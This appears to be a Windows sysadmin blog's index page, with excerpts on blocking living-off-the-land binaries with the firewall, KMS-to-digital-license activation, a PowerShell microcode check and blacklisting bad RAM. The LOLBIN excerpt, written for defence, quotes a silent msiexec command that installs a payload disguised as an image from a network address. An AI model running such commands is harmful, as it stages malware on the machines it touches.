Blocking Living off the Land binaries (LOLBINs) with Windows Firewall

Many types of malware and remote access trojans (RATs) now use built-in Windows binaries to stage and infect computers. Programs commonly used in such attacks are powershell.exe, regsvr32, rundll32, certreq.exe, certutil.exe and mshta.exe. Living off the land binaries (LOLBINs) bypass protections such as AppLocker since they reside in the C:\Windows folder and/or are code-signed by Microsoft. One example is `msiexec /q /i http://192.168.100.3/tmp/cmd.png`. A great overview of how built-in binaries can be "abused" to download or execute code can be found at the LOLBAS project. ...

December 5, 2022

Moving from KMS activation to Digital License (subscription)

At work we are moving everything to Microsoft 365 and Azure AD and removing our on-premises environment. One of the issues we encountered was that when we removed a computer from the domain and joined it to Azure AD, Windows was still activated using our KMS host. In order to convert the computer to step-up activation (digital license) we had to install the product key that came with the machine (OEM), after which it would automatically change to a digital license subscription. ...

October 8, 2020

View CPU microcode revision from powershell

A small PowerShell snippet to show which CPU microcode revision is running and which microcode revision the BIOS provides.

    # Registry key holding the details of the first logical processor
    $registrypath = "Registry::HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\"
    $processor = (Get-ItemProperty -Path $registrypath)."ProcessorNameString"
    # Revision supplied by the BIOS/UEFI firmware (REG_BINARY)
    $biosMicrocode = (Get-ItemProperty -Path $registrypath)."Previous Update Revision"
    # Revision currently loaded on the CPU (REG_BINARY)
    $runningMicrocode = (Get-ItemProperty -Path $registrypath)."Update Revision"
    # Convert to string and remove leading zeros
    $biosMicrocodeInHex = (-join ($biosMicrocode[0..4] | foreach { $_.ToString("X2") })).TrimStart('0')
    $runningMicrocodeInHex = (-join ($runningMicrocode[0..4] | foreach { $_.ToString("X2") })).TrimStart('0')
    Write-Host "CPU: $processor"
    Write-Host "BIOS microcode revision: 0x$biosMicrocodeInHex"
    Write-Host "Current microcode revision: 0x$runningMicrocodeInHex"

Example output: ...

June 28, 2018

Blacklist bad memory addresses in Windows

Update: The following guide might not work since Predictive Failure Analysis (PFA) memory settings are not working in Windows 10 2004 and 20H2 releases. See discussion here. I recently experienced random MEMORY_MANAGEMENT BSODs on my personal computer. When consulting Microsoft Dev Center for the error code, it indicated an issue with the RAM. The computer is 6 years old and only has 8 GB of RAM (two sticks), so I'm not about to spend money to replace the RAM. ...

June 22, 2018